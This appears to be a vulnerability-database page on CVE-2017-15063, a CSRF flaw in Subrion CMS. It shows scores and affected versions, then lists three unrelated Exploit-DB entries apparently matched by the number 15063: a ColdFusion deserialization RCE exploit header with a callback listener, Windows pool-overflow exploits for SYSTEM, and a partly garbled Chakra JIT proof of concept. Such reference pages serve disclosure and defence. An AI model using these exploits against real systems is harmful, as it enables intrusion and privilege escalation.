CVE-2017-15063
published 2017-10-06CVE-2017-15063: There are CSRF vulnerabilities in Subrion CMS 4.1.x through 4.1.5, and before 4.2.0, because of a logic error. Although there is functionality to detect CSRF…
PriorityP336high8.8CVSS 3.0
AVNACLPRNUIRSUCHIHAH
EPSS
0.52%
39.9th percentile
There are CSRF vulnerabilities in Subrion CMS 4.1.x through 4.1.5, and before 4.2.0, because of a logic error. Although there is functionality to detect CSRF, it is called too late in the ia.core.php code, allowing (for example) an attack against the query parameter to panel/database.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliants | subrion | <= 4.1.5 | — |
| intelliants | subrion | >= 4.1 < 4.2.0 | 4.2.0 |
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Subrion CMS CSRF Vulnerability
osv·2022-05-14
CVE-2017-15063 [HIGH] Subrion CMS CSRF Vulnerability
Subrion CMS CSRF Vulnerability
There are CSRF vulnerabilities in Subrion CMS 4.1.x through 4.1.5, and before 4.2.0, because of a logic error. Although there is functionality to detect CSRF, it is called too late in the ia.core.php code, allowing (for example) an attack against the query parameter to panel/database.
GHSA
Subrion CMS CSRF Vulnerability
ghsa·2022-05-14
CVE-2017-15063 [HIGH] CWE-352 Subrion CMS CSRF Vulnerability
Subrion CMS CSRF Vulnerability
There are CSRF vulnerabilities in Subrion CMS 4.1.x through 4.1.5, and before 4.2.0, because of a logic error. Although there is functionality to detect CSRF, it is called too late in the ia.core.php code, allowing (for example) an attack against the query parameter to panel/database.
No detection rules found.
Exploit-DB
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
exploitdb·2018-02-07·CVSS 9.8
CVE-2017-3066 [CRITICAL] Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
---
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary
Exploit-DB
Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
exploitdb·2017-10-06·CVSS 7.8
CVE-2016-3309 [HIGH] Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow
---
Sources:
https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
https://github.com/siberas/CVE-2016-3309_Reloaded
Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
The Visual Studio solution contains three exploits:
CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
CVE-2016-3309_Reloaded_Deadlock: POC exploi
Exploit-DB
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
exploitdb·2017-08-17
CVE-2017-8601 Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
---
'use strict';
function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}
function main() {
let a = [1.1, 2.2];
let b = new Uint32Array(100);
for (let i = 0; i {
a[0] = {};
return 0;
}});
a[0].toString();
}
main();
// Tested on Microsoft Edge 40.15063.0.0(Insider Preview).
No writeups or analysis indexed.
2017-10-06
Published